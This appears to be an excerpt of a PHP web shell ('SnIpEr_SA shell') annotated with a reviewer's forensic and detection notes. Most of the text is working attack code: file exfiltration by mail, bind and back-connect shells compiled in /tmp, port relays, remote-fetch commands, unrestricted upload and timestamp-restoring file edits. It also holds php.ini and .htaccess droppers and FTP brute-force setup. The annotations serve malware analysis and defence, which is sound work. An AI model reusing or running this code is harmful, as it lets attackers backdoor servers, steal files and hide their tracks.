// Host summary table: OS string, server software, effective user/group, working directory
// and the client and server IP addresses. Unix and non-Unix hosts get different layouts.
// Reviewer notes:
//  - $uname, $id and $sysctl may have been read from request cookies earlier in the file
//    and are printed here without HTML escaping.
//  - The "Server ip" value is gethostbyname() of the client-supplied Host header, so each
//    page load can trigger a DNS lookup for a name the client chose.
//  - $SERVER_SOFTWARE is read as a plain variable; presumably it relies on register_globals
//    or an assignment outside this excerpt - confirm.
3878 echo '</font></td></tr><table>
3879 <table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc>
3880 <tr><td align=right width=100>';
3881 echo $font;
3882 if($unix){
3883 echo '<font color=#990000><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
3884 echo "</td><td>";
3885 echo "<font face=tahoma size=-2 color=#cccccc><b>";
// Falls back to php_uname() when no uname value is available; both are cut to 120 characters.
3886 echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
3887 echo ws(3).$sysctl."<br>";
3888 echo ws(3).ex('echo $OSTYPE')."<br>";
3889 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
// Identity line: the cached `id` output if present, else the POSIX functions, else PHP's
// own get_current_user()/getmyuid()/getmygid().
3890 if(!empty($id)) { echo ws(3).$id."<br>"; }
3891 else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
3892  {
3893  $euserinfo  = @posix_getpwuid(@posix_geteuid());
3894  $egroupinfo = @posix_getgrgid(@posix_getegid());
3895  echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
3896  }
3897 else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
3898 echo ws(3).$dir;
3899 echo ws(3).'( '.perms(@fileperms($dir)).' )';
3900 echo "<br>";
3901 echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
3902 echo "</b></font>";
3903 }
3904 else
3905 {
// Non-Unix layout: php_uname(), server software, the USERNAME environment variable and $dir.
3906 echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
3907 echo "</td><td>";
3908 echo "<font face=tahoma size=-2 color=red><b>";
3909 echo ws(3).@substr(@php_uname(),0,120)."<br>";
3910 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
3911 echo ws(3).@getenv("USERNAME")."<br>";
3912 echo ws(3).$dir;
3913 echo "<br>";
3914 echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
3915 echo "<br></font>";
3916 }
3917 echo "</font>";
3918 echo "</td></tr></table>";
// cmd=mail: sends an e-mail through the host's mail() using recipient, subject, body and
// sender taken directly from the POST request, then clears cmd.
// Reviewer notes: this makes the compromised host a mail relay for whoever can reach the page.
// The `from` value is concatenated into the header string unchecked, so CR/LF in it can add
// further headers.
// Detection: bursts of outbound mail submitted by the web-server account.
// NOTE(review): err() is defined outside this excerpt; it is called with 6 plus mail()'s
// boolean result, presumably selecting a failure/success message - confirm.
3919 if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
3920  {
3921  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
3922  err(6+$res);
3923  $_POST['cmd']="";
3924  }
// cmd=mail_file: reads the local file named in POST loc_file and mails it as an attachment
// to the POSTed recipient - a file-exfiltration path that needs no inbound connection.
// Any file readable by the web-server account can be sent.
// Detection strings visible here: default subject 'file from SnIpEr_SA shell' and default
// sender 'billy@microsoft.com', used when the request leaves those fields empty.
// NOTE(review): compress() and mailattach() are defined outside this excerpt. $mime_type is
// set to '' here and then placed in the attachment, so compress() presumably fills it
// (and may rewrite $filename/$filedump) by reference or via globals - confirm.
3925 if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
3926  {
3927  if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
3928  else
3929   {
3930     $filename = @basename($_POST['loc_file']);
3931     $filedump = @fread($file,@filesize($_POST['loc_file']));
3932     fclose($file);
3933     $content_encoding=$mime_type='';
3934     compress($filename,$filedump,$_POST['compress']);
3935     $attach = array(
3936                     "name"=>$filename,
3937                     "type"=>$mime_type,
3938                     "content"=>$filedump
3939                    );
3940     if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
3941     if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
3942     $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
3943     err(6+$res);
3944     $_POST['cmd']="";
3945   }
3946  }
// cmd=find_text: rewrites cmd into a `find <dir> -name '<mask>' | xargs grep -E '<text>'`
// pipeline built from three POST fields.
// NOTE(review): the rewritten cmd is presumably run by a command handler later in the
// file (not visible here) - confirm.
// The values are concatenated with no escaping. The single quotes are cosmetic: a value
// containing a quote changes the command line.
// Detection: find|xargs|grep process chains whose parent is the PHP/web-server process.
3947 if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
3948 {
3949 $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
3950 }
// cmd=ch_: changes owner, group or mode of the path in POST param1 to the value in param2,
// selected by POST `what` (own / grp / mod), then clears cmd.
// All three calls are @-silenced, so a failure is neither reported nor logged.
// Detection: unexpected permission or ownership changes on files under the web root.
3951 if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
3952  {
3953  switch($_POST['what'])
3954    {
3955    case 'own':
3956    @chown($_POST['param1'],$_POST['param2']);
3957    break;
3958    case 'grp':
3959    @chgrp($_POST['param1'],$_POST['param2']);
3960    break;
3961    case 'mod':
// The mode string is parsed as octal (base 8) before being passed to chmod().
3962    @chmod($_POST['param1'],intval($_POST['param2'], 8));
3963    break;
3964    }
3965  $_POST['cmd']="";
3966  }
// cmd=mk: creates or deletes a file or directory at the path in POST mk_name.
// POST `what` selects file/dir and POST `action` selects create/delete.
// The path is used exactly as supplied, so the operation is limited only by the web-server
// account's permissions and any open_basedir restriction.
3967 if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
3968  {
3969    switch($_POST['what'])
3970    {
3971      case 'file':
3972       if($_POST['action'] == "create")
3973        {
// Refuses to overwrite an existing file. On success cmd is switched to edit_file with
// e_name set, so the same request continues into the editor branch below.
3974        if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
3975        else {
3976         fclose($file);
3977         $_POST['e_name'] = $_POST['mk_name'];
3978         $_POST['cmd']="edit_file";
3979         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
3980         }
3981        }
3982        else if($_POST['action'] == "delete")
3983        {
// A failed unlink() prints nothing; cmd is cleared either way.
3984        if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
3985        $_POST['cmd']="";
3986        }
3987      break;
3988      case 'dir':
3989       if($_POST['action'] == "create"){
3990       if(mkdir($_POST['mk_name']))
3991        {
3992          $_POST['cmd']="";
3993          echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
3994        }
3995       else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
3996       }
3997       else if($_POST['action'] == "delete"){
3998       if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
3999       $_POST['cmd']="";
4000       }
4001      break;
4002    }
4003  }
// cmd=edit_file: shows the file named in POST e_name inside a textarea form that posts back
// with cmd=save_file, then stops the script.
// Only the file contents pass through htmlspecialchars(). The file name and $dir are written
// into the page and into unquoted hidden-field values without escaping.
4004 if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
4005  {
// Writability probe: if opening with "r+" fails the file is flagged read-only. The fclose()
// on that line runs only in the failure case, on a false handle, and is @-silenced.
// A handle opened successfully by this probe is replaced by the next fopen() without being closed.
4006  if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
4007  if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
4008  else {
4009  echo $table_up3;
4010  echo $font;
4011  echo "<form name=save_file method=post>";
4012  echo ws(3)."<b>".$_POST['e_name']."</b>";
4013  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
4014  echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
4015  fclose($file);
4016  echo "</textarea>";
4017  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
4018  echo "<input type=hidden name=dir value=".$dir.">";
4019  echo "<input type=hidden name=cmd value=save_file>";
// Read-only files get a notice instead of the submit button.
4020  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
4021  echo "</div>";
4022  echo "</font>";
4023  echo "</form>";
4024  echo "</td></tr></table>";
4025  exit();
4026  }
4027  }
// cmd=save_file: overwrites the file named in POST e_name with POST e_text.
// Forensics note: the file's modification time is read before the write and put back with
// touch() afterwards (mtime and atime both set to the old mtime), so an mtime-sorted listing
// will not show the edit. touch() cannot reset the inode change time, so a ctime newer than
// mtime on a web-root file is a useful tamper indicator; file-integrity hashes are unaffected.
4028 if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
4029  {
4030  $mtime = @filemtime($_POST['e_name']);
4031  if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
4032  else {
// On Unix hosts CRLF line endings from the browser form are converted to LF before writing.
4033  if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
// The handle is never closed explicitly in this branch.
4034  @fwrite($file,$_POST['e_text']);
4035  @touch($_POST['e_name'],$mtime,$mtime);
4036  $_POST['cmd']="";
4037  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
4038  }
4039  }
4040 
// Bind-listener path (use=C). cf() is called with /tmp/bd.c and $port_bind_bd_c, gcc builds /tmp/bd, the
// source file is unlinked, and /tmp/bd is started in the background with POST port and bind_pass as arguments.
// cf(), ex() and $port_bind_bd_c are defined outside this excerpt; cf() presumably writes the payload to the
// given path and ex() runs a shell command - confirm against their definitions.
// Host artifacts: /tmp/bd on disk, a gcc child of the web-server process, and a new listening socket owned
// by the web-server account. The request values are concatenated into the command line without quoting.
// The first $_POST['cmd'] assignment is overwritten by the next line, so only the echo string remains.
4041 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
4042 {
4043  cf("/tmp/bd.c",$port_bind_bd_c);
4044  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
4045  @unlink("/tmp/bd.c");
4046  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
4047  $_POST['cmd']="ps -aux | grep bd";
4048 $_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
4049 }
// port1 path: cf() is called with "bds" (relative to the working directory) and $port_bind_bd_cs, the file
// is given mode 777 and started in the background with POST port1 as its argument.
// The else branch runs on every request that does NOT carry port1, so cf("/tmp/bds", ...) is also invoked
// on ordinary page loads. Assuming cf() writes the file (it is defined outside this excerpt - confirm),
// /tmp/bds is an artifact to look for on any host where this script has merely been opened.
4050 if (!empty($_POST['port1']))
4051 {
4052  cf("bds",$port_bind_bd_cs);
4053  $blah = ex("chmod 777 bds");
4054  $blah = ex("./bds ".$_POST['port1']." &");
4055  $_POST['cmd']="echo \"Now script install backdoor connect to port ";
4056   }else{
4057 cf("/tmp/bds",$port_bind_bd_cs);
4058  $blah = ex("chmod 777 bds");
4059  $blah = ex("./tmp/bds ".$_POST['port1']." &");
4060  }
// Three droppers that call cf() with a relative filename, i.e. in the script's working directory:
// php.ini (POST php_ini1), .htaccess (POST htacces) and ini.php (POST file_ini).
// The payloads $php_ini1, $htacces and $sni_res are defined outside this excerpt, so their contents cannot
// be stated here. During cleanup, treat php.ini / .htaccess / ini.php files that appear inside a web root
// and are owned by the web-server account as suspect and compare them with the deployed versions.
// The strings assigned to $_POST['cmd'] are status text (non-ASCII characters were lost to '?' in this copy).
// NOTE(review): the ini.php status text mentions an "ss" parameter carrying a URL - requests to ini.php
// with an ss query parameter are worth searching for in access logs; confirm against $sni_res.
4061 if (!empty($_POST['php_ini1']))
4062 {
4063  cf("php.ini",$php_ini1);
4064   $_POST['cmd']=" ?????? ????? ??? php.ini ?? ??? ???";
4065  }
4066  if (!empty($_POST['htacces']))
4067 {
4068  cf(".htaccess",$htacces);
4069   $_POST['cmd']="?????? ????? ??????? htaccess ?? ??? ???";
4070  }
4071   if (!empty($_POST['file_ini']))
4072 {
4073  cf("ini.php",$sni_res);
4074   $_POST['cmd']=" http://target.com/ini.php?ss=http://shell.txt? ??????? ss ???????? ini.php ???? ?? ???? ?????? ????";
4075  }
// Copy primitive: reads POST filefrom with file() and writes the bytes to POST fileto.
// The guard uses ||, so the block runs when either field is non-empty.
// file() accepts URL wrappers when allow_url_fopen is enabled, so filefrom can name a remote source as
// well as a local path. Neither file() nor fopen() is checked for failure before the result is used.
// On success the size of the written file is reported in KB.
4076 if(($_POST['fileto'] != "")||($_POST['filefrom'] != ""))
4077 {
4078 $data = implode("", file($_POST['filefrom']));
4079 $fp = fopen($_POST['fileto'], "wb");
4080 fputs($fp, $data);
4081 $ok = fclose($fp);
4082 if($ok)
4083 {
4084 $size = filesize($_POST['fileto'])/1024;
4085 $sizef = sprintf("%.2f", $size);
4086 print "<center><div id=logostrip>Download - OK.
4087 (".$sizef."ê?)</div></center>";
4088 }
4089 else
4090 {
4091 print "<center><div id=logostrip>Something is wrong. Download - IS NOT
4092 OK</div></center>";
4093 }
4094 }
// Six network helpers that all follow one pattern: cf() is called with a path under /tmp and a payload
// variable defined outside this excerpt, then the result is run in the background via ex(), either
// through the perl interpreter located by which() or after compiling it with gcc.
// Files named on these lines: /tmp/bdpl, /tmp/back, /tmp/backs, /tmp/back.c -> /tmp/backc, /tmp/dp,
// /tmp/dpc.c -> /tmp/dpc. The .c sources are unlinked after compilation; the other files are left in place.
// Request values (port, ip, remote_host, ...) are concatenated into the command lines without quoting.
// Defensive view: the web-server account spawning perl or gcc, executables appearing in /tmp, and new
// listening or outbound sockets owned by that account are the observable signals. Mounting /tmp noexec,
// keeping compilers off web hosts and restricting egress from them limit what these branches can achieve.
//
// Perl listener: bind_pass is required by the guard but only port is passed on the command line.
4095 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
4096 {
4097  cf("/tmp/bdpl",$port_bind_bd_pl);
4098  $p2=which("perl");
4099  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
4100  $_POST['cmd']="ps -aux | grep bdpl";
4101  $_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
4102 }
// Outbound connection (Perl) to POST ip:port.
4103 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
4104 {
4105  cf("/tmp/back",$back_connect);
4106  $p2=which("perl");
4107  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
4108  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...Datached\"";
4109 }
// Second outbound variant driven by POST ips/ports; it does not check the "use" field.
4110 if (!empty($_POST['ips']) && !empty($_POST['ports']))
4111 {
4112  cf("/tmp/backs",$back_connects);
4113  $p2=which("perl");
4114  $blah = ex($p2." /tmp/backs ".$_POST['ips']." ".$_POST['ports']." &");
4115  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ips']." port ".$_POST['ports']." ...\"";
4116 }
// Outbound connection (C), compiled on the host.
4117 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
4118 {
4119  cf("/tmp/back.c",$back_connect_c);
4120  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
4121  @unlink("/tmp/back.c");
4122  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
4123  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4124 }
// NOTE(review): by its variable name and arguments (local_port, remote_host, remote_port) this looks like
// a port relay - confirm against $datapipe_pl.
4125 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
4126 {
4127  cf("/tmp/dp",$datapipe_pl);
4128  $p2=which("perl");
4129  $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
4130  $_POST['cmd']="ps -aux | grep dp";
4131 }
// C variant of the same helper; note the argument order differs (local_port, remote_port, remote_host).
4132 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
4133 {
4134  cf("/tmp/dpc.c",$datapipe_c);
4135  $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
4136  @unlink("/tmp/dpc.c");
4137  $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
4138  $_POST['cmd']="ps -aux | grep dpc";
4139 }
// Alias lookup: when POST alias names an entry in $aliases (defined outside this excerpt), that entry
// replaces the command in $_POST['cmd'].
4140 if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
// Upload handler: copies the uploaded temp file to POST dir + "/" + POST new_name, falling back to the
// client-supplied filename. No check is made on extension, content type or destination path, and copy()
// is used instead of move_uploaded_file(), which is the call that verifies the source is a real upload.
// Any directory writable by the web-server account can therefore receive a file with any name.
4141 if (!empty($HTTP_POST_FILES['userfile']['name']))
4142 {
4143 if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
4144 else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
4145 @copy($HTTP_POST_FILES['userfile']['tmp_name'],
4146             $_POST['dir']."/".$nfn)
4147       or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
4148 }
// Remote-fetch builder: turns POST with / rem_file / loc_file into a wget, fetch, lynx, links, GET or curl
// command line and stores it in $_POST['cmd']. Nothing is executed in this block itself.
// rem_file and loc_file are concatenated unquoted, so the shell interprets them when the command is run.
// The case labels are bare words (wget, fetch, ...) rather than quoted strings. which() is defined
// outside this excerpt.
// Defensive view: download utilities started as children of the web-server process, and outbound HTTP/FTP
// requests from a host that normally only serves traffic, are the signals this leaves.
4149 if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
4150 {
4151  switch($_POST['with'])
4152  {
4153  case wget:
4154  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
4155  break;
4156  case fetch:
4157  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
4158  break;
4159  case lynx:
4160  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
4161  break;
4162  case links:
4163  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
4164  break;
4165  case GET:
4166  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
4167  break;
4168  case curl:
4169  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
4170  break;
4171  }
4172 }
// FTP transfer (cmd=ftp_file_up / ftp_file_down): splits POST ftp_server_port into host and port
// (default 21), logs in with POST ftp_login / ftp_password and moves one file between the web host and
// the FTP server. For ftp_file_down, when loc_file equals $dir the remote file's basename is appended.
// Results of ftp_get()/ftp_put() are suppressed with @ and never checked; ftp_close() is called even if
// the connection failed. err() is defined outside this excerpt.
// Outbound FTP sessions originating from a web server are a staging/exfiltration signal for egress monitoring.
4173 if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
4174  {
4175  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
4176  if(empty($ftp_port)) { $ftp_port = 21; }
4177  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
4178  if(!$connection) { err(3); }
4179  else
4180   {
4181   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
4182   else
4183    {
4184    if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
4185    if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
4186    }
4187   }
4188  @ftp_close($connection);
4189  $_POST['cmd'] = "";
4190  }
// Pre-flight for cmd=ftp_brute: checks that the FTP server in POST ftp_server_port answers and that
// get_users() (defined outside this excerpt) returns a user list. On either failure the command is cleared,
// which also prevents the later login loop from running. The probe connection is closed again here.
4191 if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
4192  {
4193  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
4194  if(empty($ftp_port)) { $ftp_port = 21; }
4195  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
4196  if(!$connection) { err(3); $_POST['cmd'] = ""; }
4197  else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
4198  @ftp_close($connection);
4199  }
// Start of the result pane. When no command was supplied a directory listing is substituted:
// "dir" or "ls -lia" depending on $unix, or the internal safe_dir pseudo-command under safe_mode.
// The command string is echoed unescaped, then the output <textarea name=report> is opened; everything
// printed until the closing tag further down is shown inside it.
4200 echo $table_up3;
4201 if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
4202 else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
4203 echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
4204 
4205 
// File viewer: $method selects one of four PHP read primitives (file, fread, show_source, readfile) and
// applies it to $file. Neither variable is assigned in this excerpt - presumably both are populated from
// the request elsewhere (e.g. register_globals) - confirm.
// NOTE(review): offering four equivalent primitives looks like a fallback for hosts where
// disable_functions blocks only some of them; a hardening list has to cover every read function, and
// open_basedir plus file permissions remain the real boundary.
// Output is not HTML-escaped, and on failure $file is interpolated into an inline <script> block.
4206 if ($method=="file") {
4207                         if (@file($file)) {
4208                                 $filer = file($file);
4209                                 foreach ($filer as $a) { echo $a; }
4210                         } else {
4211                                 echo "<script> alert(\"unable to read file: $file using: file\"); </script>";
4212                         }
4213                 }
// fread variant: the file is opened once as a test and again for the read; neither handle is closed.
4214                 if ($method=="fread") {
4215                         if (@fopen($file, 'r')) {
4216                                 $fp = fopen($file, 'r');
4217                                 $string = fread($fp, filesize($file));
4218                                 echo "<pre>";
4219                                 echo $string;
4220                                 echo "</pre>";
4221                         } else {
4222                                 echo "<script> alert(\"unable to read file: $file using: fread\"); </script>";
4223                         }
4224                 }
// show_source variant: show_source() is called in the condition and again inside the branch.
4225                 if ($method=="show_source") {
4226                         if (show_source($file)) {
4227                                 echo "<pre>";
4228                                 echo show_source($file);
4229                                 echo "</pre>";
4230                         } else {
4231                                 echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
4232                         }
4233                 }
// readfile variant: readfile() writes the file straight to the output as a side effect of the condition.
4234                 if ($method=="readfile") {
4235                         echo "<pre>";
4236                         if (readfile($file)) {
4237                                 //echo "<pre>";
4238                                 //echo readfile($file);
4239                                 echo "</pre>";
4240                         } else {
4241                                 echo "</pre>";
4242                                 echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>";
4243                         }
4244                 }
// dozip1($link, $file): copies everything readable from $link into $file.
//   $link - source path; fopen() also accepts URL wrappers when allow_url_fopen is enabled.
//   $file - destination path, opened with mode "w" (truncated or created).
// The source is read in 1024-byte chunks into $cont and written out in one fwrite().
// Both fopen() calls are silenced with @ and neither result is checked before use, and the whole source
// is buffered in memory. Returns nothing.
4245 function dozip1($link,$file)
4246 {
4247    $fp = @fopen($link,"r");
4248    while(!feof($fp))
4249    {
4250        $cont.= fread($fp,1024);
4251    }
4252    fclose($fp);
4253    $fp2 = @fopen($file,"w");
4254    fwrite($fp2,$cont);
4255    fclose($fp2);
4256 }
// Invoked with POST funzip as the source and POST fzip as the destination, i.e. a request-controlled
// fetch-and-write to any location the web-server account can write.
4257 if (isset($_POST['funzip']))
4258 {
4259 dozip1($_POST['funzip'],$_POST['fzip']);
4260 }
// Directory-name enumeration that depends on safe_mode warning text.
// $root is taken from POST root when that field is non-empty.
// For each 1- to 4-character prefix built from $chars under $root, glob() is called only for its side
// effect: the error handler eh() installed here records the path PHP names in its
// "SAFE MODE Restriction in effect" warning into the global $D. A prefix is extended by one more
// character only when the preceding glob() call changed the last entry of $D.
// safe_mode was removed in PHP 5.4, so on current PHP that warning is never produced and $D stays empty.
// The loops are top-level code and run on every request that reaches this point; results are printed only
// when a "root" request parameter is present. The handler stays installed for the rest of the script.
4261 if(empty($_POST['root'])){
4262 } else {
4263    $root = $_POST['root']; }
4264 
4265 
4266   $c = 0; $D = array();
4267   set_error_handler("eh");
4268   $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
4269   for($i=0; $i < strlen($chars); $i++){
4270   $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
4271   $prevD = $D[count($D)-1];
4272   glob($path."*");
4273         if($D[count($D)-1] != $prevD){
4274         for($j=0; $j < strlen($chars); $j++){
4275            $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
4276            $prevD2 = $D[count($D)-1];
4277            glob($path."*");
4278               if($D[count($D)-1] != $prevD2){
4279 
4280                  for($p=0; $p < strlen($chars); $p++){
4281                  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
4282                  $prevD3 = $D[count($D)-1];
4283                  glob($path."*");
4284                     if($D[count($D)-1] != $prevD3){
4285 
4286                        for($r=0; $r < strlen($chars); $r++){
4287                        $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
4288                        glob($path."*");
4289                        }
4290                     }
4291                  }
4292               }
4293         }
4294         }
4295   }
// Duplicate captures are removed before output.
4296   $D = array_unique($D);
4297 
4298 
4299   foreach($D as $item)
4300   if(isset($_REQUEST['root']))
4301   echo "{$item}\n";
4302 
4303 
// eh(): error handler registered with set_error_handler("eh").
//   $errno, $errfile, $errline - unused.
//   $errstr - warning text; matched against the safe_mode restriction message.
// On a match, the second capture group (the text between "is not allowed to access" and "owned by uid")
// is appended to the global array $D at index $c, and $c is incremented. Non-matching messages are
// dropped. Nothing is returned.
4304   function eh($errno, $errstr, $errfile, $errline){
4305      global $D, $c, $i;
4306      preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
4307      if($o){ $D[$c] = $o[2]; $c++;}
4308   }
4309 
4310 
// Main command dispatch.
// With safe_mode on, only cmd=safe_dir is handled: a listing of $dir built from dir()/stat() and, on
// Unix, posix_getpwuid()/posix_getgrgid(), without invoking a shell. perms() is defined outside this excerpt.
// With safe_mode off, any cmd other than the four internal handlers (php_eval, mysql_dump, db_query,
// ftp_brute) is passed verbatim to ex(), defined outside this excerpt, and the result is HTML-escaped
